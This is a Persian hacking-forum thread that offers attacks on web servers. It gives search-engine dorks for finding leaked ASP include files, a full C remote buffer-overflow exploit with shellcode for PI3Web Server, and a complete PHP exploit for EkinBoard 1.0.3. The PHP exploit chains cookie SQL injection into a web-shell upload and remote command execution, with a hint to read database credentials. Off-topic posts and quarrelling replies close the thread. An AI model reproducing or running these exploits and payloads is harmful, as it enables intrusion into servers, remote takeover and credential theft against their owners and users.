هك سرورهاي Asp به وسيله باگ موجود در Mssql

ASP ---- BY Satanic_soulful
توضيح:

با ارائه مقاديري به فايل .asp به جاي .inc مي توان از error VBScript در ديتابيس Microsoft بهره گرفت. اين عمل را موتور ASP موجود در Altavista Search Engine با تست بر روي url هاي موجود انجام مي دهد.
مثال
در سايت altavista.com اين عبارت را جستجو كنيد
+"Microsoft VBScript runtime error" +".inc, "

+"Microsoft VBScript runtime error" +".lib, "


[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با اين روش شما مي توانيد پيغام runtime error را مشاهده كنيد كه در ادامه error شما اين چنين آدرسهايي نيز دريافت مي كنيد
كد:


includes/general.inc
/corporate/admin/include/jobs.inc
/SFLib/design.inc
include/filter.inc
scripts/IsSearchEngine.inc
and …


كه اين آدرس ها به اين صورت در error نوشته شده
Parse error on line XYZ in file /home/www/htdocs/include/filter.inc

شما آن قسمت آخر را كه در مثال بالا آمده به آدرس اصلي وصل مي كنيد. بدين شكل
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اميدوارم موفق شويد.

PI3Web Server
اكسپلويتي توپ براي هك وب سرور PI3Web بگيريد كه روي كليه ورژن هاي اين وب سرور جواب ميده البته بايد كامپايل شود



[PHP]/*
* Synnergy Networks
* Remote overflow for PI3Web Server (all versions) for Win95/98/NT
*
* Linux/IRIX/Solaris versions exist, however I haven't tested them.
* vulnerability was posted around a week ago on bugtraq - no exploit
* code released.
*
* In short, by sending an excessively large GET request to the tstisapi.dll
* running on PI3Web, will cause an overflow in the request parsing, forcing
* a complete EIP overwrite.
*
* POC exploit tested against Win95/Win98.
*
* [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] // [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
* 2 March 2001
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <getopt.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>


#define PORT 80
#define BSIZE 2048
#define ADDR 1047 // 24 (query) + 1024 (A) - 1
#define MAX_TYPE 3
#define MAX_SHELL 4
int type = 0;
int shellval = -1;

typedef struct
{
char *platform;
char *type;
char *code;
} SHELLCODE;

typedef struct
{
char *platform;
char *version;
SHELLCODE *shellcode;
unsigned long ret;
} TARGET;

SHELLCODE shellcodes[] =
{
{ "Windows 9x", "description of shellcode", "Put whatever shellcode you got for 95/98 here"
},
{ "Windows 9x", "Non-intrusive shellcode: IE launcher",
"\xE8\x00\x00\x00\x00\x5D\x81\xED\x40\x10\x40\x00\ x81\xC4\x00"
"\x03\x00\x00\xB8\x38\x10\x00\x01\x8B\x00\x89\x85\ x0B\x11\x40\x00"
"\x8C\xC8\xA8\x04\x75\x08\x8B\x85\x1F\x11\x40\x00\ xEB\x06\x8B\x85"
"\x23\x11\x40\x00\x89\x85\x1F\x11\x40\x00\x8D\x8D\ x42\x11\x40\x00"
"\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x0F\x11\ x40\x00\x8D\x8D"
"\x53\x11\x40\x00\x51\xFF\x95\x0F\x11\x40\x00\x8D\ x8D\x34\x11\x40"
"\x00\x51\x50\xFF\x95\x0B\x11\x40\x00\x89\x85\x13\ x11\x40\x00\x8B"
"\x85\x1F\x11\x40\x00\x8D\x8D\x27\x11\x40\x00\x51\ x50\xFF\x95\x0B"
"\x11\x40\x00\x89\x85\x17\x11\x40\x00\x8D\x85\x1B\ x11\x40\x00\x50"
"\x6A\x00\x6A\x00\x8D\x85\xE3\x10\x40\x00\x50\x6A\ x00\x6A\x00\x8B"
"\x85\x17\x11\x40\x00\xFF\xD0\xEB\xFE\x60\xE8\x00\ x00\x00\x00\x5D"
"\x81\xED\xE9\x10\x40\x00\x6A\x00\x6A\x00\x6A\x00\ x8D\xB5\x5F\x11"
"\x40\x00\x56\x6A\x00\x6A\x00\xFF\x95\x13\x11\x40\ x00\x61\xC2\x10"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\xF0\x77\x00\x00\xF7\ xBF\x43\x72\x65"
"\x61\x74\x65\x54\x68\x72\x65\x61\x64\x00\x53\x68\ x65\x6C\x6C\x45"
"\x78\x65\x63\x75\x74\x65\x41\x00\x47\x65\x74\x4D\ x6F\x64\x75\x6C"
"\x65\x48\x61\x6E\x64\x6C\x65\x41\x00\x73\x68\x65\ x6C\x6C\x33\x32"
"\x2E\x64\x6C\x6C\x00\x77\x77\x77\x2E\x75\x73\x73\ x72\x62\x61\x63"
"\x6B\x2E\x63\x6F\x6D\x00"
},
{ "Windows NT", "generic cmd.exe",
"\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77\xFF\ xD0\x33\xDB\x53"
"\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64\x2E\x65\ x78\x65\x0D\x0A"
},
{ NULL, NULL, NULL }
};

TARGET targets[] =
{
{ "Microsoft Windows", "95", &shellcodes[0], 0x0432f3a4 },
{ "Microsoft Windows", "98", &shellcodes[0], 0x03c5f3a8 },
{ "Microsoft Windows", "NT", &shellcodes[2], 0xbabebabe },
{ NULL, NULL, 0, 0 }
};

void usage(char *prog)
{
int i;
printf("\nPI3Web server for Win95/98/NT remote exploit by dethy\n");
printf("Exploit by [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] - Synnergy Networks!@# - http://www.synnergy.net/n/n");
printf("Usage %s <victim> [ -t type ] [ -s shellcode ]\n", prog);

printf("\n[-t] vulnerable OS:\n");
for(i=0; targets[i].platform != NULL; i++)
printf("%d %s %s %s - 0x%x\n", i, targets[i].platform, targets[i].version, targets[i].shellcode->platform, targets[i].ret);

printf("\n[-s] shellcodes types:\n");
for(i=0; shellcodes[i].platform != NULL; i++)
printf("%d %s (%d bytes) %s\n", i , shellcodes[i].platform, strlen(shellcodes[i].code), shellcodes[i].type);
printf("\n");
exit(0);
}

int main(int argc, char **argv){

char *prog = argv[0];
char exploit[BSIZE];
struct sockaddr_in server;
struct hostent *hp;
unsigned long host;
int i, s;
int c=0;

if(argc < 2) usage(prog);

while ((c = getopt(argc, argv, "t:s:")) != EOF)
{
switch©
{
case 't':
if((atoi(optarg) < 0) || (atoi(optarg) > MAX_TYPE))
{
fprintf(stderr, "Invalid type, range is 0 to %d.\n", MAX_TYPE);
usage(prog);
}
type = atoi(optarg);
printf("type is %d, %s.\n", type, targets[type].platform);
break;
case 's':
if((atoi(optarg) < 0) || (atoi(optarg) > MAX_SHELL))
{
fprintf(stderr, "Invalid shellcode number, range is 0 to %d.\n", MAX_SHELL);
usage(prog);
}
shellval = atoi(optarg);
printf("shellcode set to %s %s\n", shellcodes[shellval].platform, shellcodes[shellval].type);
break;
default:
fprintf(stderr, "No such option.\n");
usage(prog);
break;
}
}

if((s = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket");
return(-1);
}

if ((hp=gethostbyname(argv[1])) == NULL){
perror("gethostbyname");
return(-1);

} else {
host = *(unsigned long *)hp->h_addr;
}

server.sin_family = AF_INET;
server.sin_addr.s_addr = host;
server.sin_port = htons(PORT);

/* construct our exploit buffer */

exploit[0]= 'G';
exploit[1]= 'E';
exploit[2]= 'T';
exploit[3]= ' ';
exploit[4]= '/';
exploit[5]= 'i';
exploit[6]= 's';
exploit[7]= 'a';
exploit[8]= 'p';
exploit[9]= 'i';
exploit[10]= '/';
exploit[11]= 't';
exploit[12]= 's';
exploit[13]= 't';
exploit[14]= 'i';
exploit[15]= 's';
exploit[16]= 'a';
exploit[17]= 'p';
exploit[18]= 'i';
exploit[19]= '.';
exploit[20]= 'd';
exploit[21]= 'l';
exploit[22]= 'l';
exploit[23]= '?';

for(i=24; i<1047; i++){
exploit[i]=0x41;
}

/* win 98
exploit[1047]=0xA8;
exploit[1048]=0xF3;
exploit[1049]=0xC5;
exploit[1050]=0x03;
*/

if(shellval != -1)
{
targets[type].shellcode = &(shellcodes[shellval]);
printf("using %s shellcode\n", shellcodes[shellval].platform);
} else {
printf("using default shellcode , %s\n", targets[type].shellcode->platform);
}

exploit[ADDR] = (targets[type].ret & 0x000000ff);
exploit[ADDR+1]=(targets[type].ret & 0x0000ff00);
exploit[ADDR+2]=(targets[type].ret & 0x00ff0000);
exploit[ADDR+3]=(targets[type].ret & 0xff000000);
// exploit[ADDR+4]= 0x00;

for(i=0; i<sizeof(targets[type].shellcode->code); i++){
exploit[1053+i] = targets[type].shellcode->code;
}

if(connect(s, (struct sockaddr *)&server, sizeof(server)) < 0){
perror("connect");
return(-1);
}
printf("connected .. now sending code\n");
if(write(s, exploit, strlen(exploit)) < 0){
perror("write");
return(-1);
}
close(s);
printf("successfully sent shellcode to %s\n", argv[1]);
return(0);
}[/PHP]

بدون شرح :

[PHP]<?php
#
# ---ekin103_xpl.php 10.47 16/11/2005 #
# #
# EkinBoard 1.0.3 config.php SQL Injection through cookie / #
# remote commands execution #
# ---> (this works with magic_quotes_gpc off) #
# #
# coded by rgod #
# site: [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] #
# #
# usage: launch from Apache, fill in requested fields, then go! #
# #
# required php.ini settings to launch this script: #
# allow_call_time_pass_reference = on #
# register_globals = on #
# #
# Sun-Tzu: "The rising of birds in their flight is the sign of an ambuscade. #
# Startled beasts indicate that a sudden attack is coming." #

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo'<html><head><title>EkinBoard 1.0.3 config.php SQL Injection / cmmnds xctn
</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:
#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;
color : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
EkinBoard 1.0.3 config.php SQL Injection / cmmnds xctn </p><p class="Stile6">a
script by rgod at <a href="http://rgod.altervista.org"target="_blank">
http://rgod.altervista.org</a></p><table width="84%"><tr><td width="43%"> <form
name="form1" method="post" action="'.$SERVER[PHP_SELF].'?path=value&host=
value&port=value&proxy=value&command=value"><p><in put type="text" name="host">
<span class="Stile5"> * hostname (ex: www.sitename.com)</span></p><p><input
type="text" name="path"> <span class="Stile5">* path ( ex: /ekinboard/ or jus
t / ) </span></p><p><input type="text" name="command"> <span class="Stile5"> *
specify a command, cat ../../db_info.php to see database username & password
</span></p> <p><input type="text" name="port"><span class="Stile5">specify a
port other than 80 ( default value ) </span></p> <p> <input type="text"
name="proxy"> <span class="Stile5"> send exploit through an HTTP proxy (ip:por
t)</span></p><p><input type="submit" name="Submit" value="go!"></p></form> </td>
</tr> </table></body></html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
$ji=0;
$ci++;
echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>";
}
$ki=$ki+16;
echo "</tr><tr>";
}
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>";
}

for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>";
}
echo "</tr></table>";
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b) ';

function sendpacket() //if you have sockets module loaded, 2x speed! if not,load
//next function to send packets
{
global $proxy, $host, $port, $packet, $html, $proxy_regex;
$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket < 0) {
echo "socket_create() failed: reason: " . socket_strerror($socket) . "<br>";
}
else
{ $c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
echo "OK.<br>";
echo "Attempting to connect to ".$host." on port ".$port."...<br>";
if ($proxy=='')
{
$result = socket_connect($socket, $host, $port);
}
else
{

$parts =explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$result = socket_connect($socket, $parts[0],$parts[1]);
}
if ($result < 0) {
echo "socket_connect() failed.\r\nReason: (".$result.") " . socket_strerror($result) . "<br><br>";
}
else
{
echo "OK.<br><br>";
$html= '';
socket_write($socket, $packet, strlen($packet));
echo "Reading response:<br>";
while ($out= socket_read($socket, 2048)) {$html.=$out;}
echo nl2br(htmlentities($html));
echo "Closing socket...";
socket_close($socket);

}
}
}
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);}
else
{
$c = preg_match($proxy_regex,$proxy);
if (!$c) {echo 'Not a valid prozy...';
die;
}
$parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...';
die;
}
}
fputs($ock,$packet);
if ($proxy=='')
{

$html='';
while (!feof($ock))
{
$html.=fgets($ock);
}
}
else
{
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml)))
{
$html.=fread($ock,1);
}
}
fclose($ock);
echo nl2br(htmlentities($html));
}


if (($host<>'') and ($path<>'') and ($command<>''))
{
$port=intval(trim($port));
if ($port=='') {$port=80;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$host=str_replace("\r\n","",$host);
$path=str_replace("\r\n","",$path);


#STEP 1 -> SQL Injection through cookie -> Change forum settings to allow .php attachments
$data="organization=&forum_email=retrogod@alicepos ta.it&forum_location=";
$data.=urlencode("http://".$host.":".$port.$path);
$data.="&activate=1&allow_attch=1&attch_exts=gif%2 C+jpg%2C+png%2C+txt%2C+php&attch_max_size=";
$data.="20480&upload_avatars=1&terms=&submit=Save+ %3E+%3E";

$SQL="'or isnull(1/0) AND level=3/*";
$SQL=urlencode($SQL);
$packet="POST ".$p."admin/index.php?page=general&step=2 HTTP/1.1\r\n";
$packet.="Accept: */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."admin/index.php?page=general\r\n";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Gameboy, Powered by Nintendo\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: username=".$SQL."; password=\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);
if (eregi('Welcome to the EKINboard Administration Panel',$html)) {echo "<br>Exploit succeeded! Now we upload a shell...";}
else {echo "<br>Exploit failed..."; die;}

#STEP 2 -> Get a forum ID for new topic...
$packet="GET ".$p."viewforum.php?id=1 HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: username=".$SQL."; password=\r\n\r\n";
show($packet);
sendpacketii($packet);
$temp=explode('newtopic.php?id=',$html);
$temp2=explode('"',$temp[1]);
$forum=$temp2[0];

echo "Forum id ->".htmlentities($forum);

#STEP 3 -> Upload a shell...
$data='-----------------------------7d536a274d0fb4
Content-Disposition: form-data; name="topic_title"

suntzu
-----------------------------7d536a274d0fb4
Content-Disposition: form-data; name="topic_description"

the art of war
-----------------------------7d536a274d0fb4
Content-Disposition: form-data; name="message"

this is very interesting: SUN TZU ON THE ART OF WAR
THE OLDEST MILITARY TREATISE IN THE WORLD

http://www.chinapage.com/sunzi-e.html
-----------------------------7d536a274d0fb4
Content-Disposition: form-data; name="attachment"; filename="C:\suntzu.php"
Content-Type: application/octet-stream

<?php echo "Hi Master!";error_reporting(0);ini_set("max_execution _time",0);system($HTTP_GET_VARS[cmd]);?>
-----------------------------7d536a274d0fb4
Content-Disposition: form-data; name="MAX_FILE_SIZE"

512000
-----------------------------7d536a274d0fb4--';

$packet="POST ".$p."newtopic.php?id=".$forum."&d=post HTTP/1.1\r\n";
$packet.="Referer: http://".$host.":".$port.$path."newtopic.php?id=1\r\n ";
$packet.="Accept-Language: en\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d536a274d0fb4\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="User-Agent: Googlebot/Test (+http://www.googlebot.com/bot.html)\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Cookie: username=".$SQL."; password=\r\n\r\n";
$packet.=$data;
show($packet);
sendpacketii($packet);

#STEP 4 -> Launch commands...
for ($i=1; $i<=99; $i++)
{
$packet="GET ".$p."uploaded/attachments/suntzu_".$i.".php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="Host: ".$host.":".$port."\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
sendpacketii($packet);
if (eregi('Hi Master',$html)) {echo "Exploit succeeded..."; die;}
}
echo "If you are here exploit succeeded but for some reason, failed to execute commands...";
}
else
{echo "Fill * requested fields, optionally specify a proxy";}
?>

# milw0rm.com [2005-11-17][/PHP]

با سلام ..

با اجازه دوستان کد ها رو يه سرو سامان دادم ... :)

بد نبود خوبم نبود

اگر شما هم زیاد اهل چت کردن هستید این برنامه را حتماً دانلود کنید همانطور که در تصویر این برنامه میبینید با استفاده از این ابزار میتوانید پیام های عشقولانه خود را به صورت تصویر یک قلب به همراه تنها یک کاراکتر در میان آن ارسال کنید، شما به راحتی میتوانید شکلک سازنده تصویر قلب و شکلک کاراکتر را به راحتی با هریک از شکلک های دیگر یاهو مسنجر عوض کنید!
با این ابزار جالب میتوانید تصاویر زیبای بسازید و آنها را برای دوستان خود ارسال کنید!
با دریافت این ابزار مطمئناً ساعت ها با آن سرگرم خواهید شد! :laughing:


راهنما:
- برای ارسال تصویر مورد نظر باید تصویر قلب داخل برنامه را با ماوس به داخل پنجره در حال چت بکشید و رها سازید!
- با برداشتن تیک گزینه Attach author name از ارسال امضا نویسنده جلوگیری کنید :evil:
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نقل قول:

---

نوشته شده توسط x_matrixbooter_x

اگر شما هم زیاد اهل چت کردن هستید این برنامه را حتماً دانلود کنید همانطور که در تصویر این برنامه میبینید با استفاده از این ابزار میتوانید پیام های عشقولانه خود را به صورت تصویر یک قلب به همراه تنها یک کاراکتر در میان آن ارسال کنید، شما به راحتی میتوانید شکلک سازنده تصویر قلب و شکلک کاراکتر را به راحتی با هریک از شکلک های دیگر یاهو مسنجر عوض کنید!
با این ابزار جالب میتوانید تصاویر زیبای بسازید و آنها را برای دوستان خود ارسال کنید!
با دریافت این ابزار مطمئناً ساعت ها با آن سرگرم خواهید شد! :laughing:


راهنما:
- برای ارسال تصویر مورد نظر باید تصویر قلب داخل برنامه را با ماوس به داخل پنجره در حال چت بکشید و رها سازید!
- با برداشتن تیک گزینه Attach author name از ارسال امضا نویسنده جلوگیری کنید :evil:
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

---

به نام خدا

دوست عزيز پست شما چه ربطي به اين تاپيك داشته؟ :blink: :blink: :blink: :blink:

ASP ---- BY Satanic_soulful

از کی تا حالا حمید باگ پیدا کرده من نمدونم :blink:

نميدونم چرا ما در مورد چيزهايي كه اطلاعاتي نداريم ازش اظهار نظر ميكنيم؟؟
هر چي يه قورباغه از ماكروفر ميدونه تو هم سواد امنيت شبكه داري.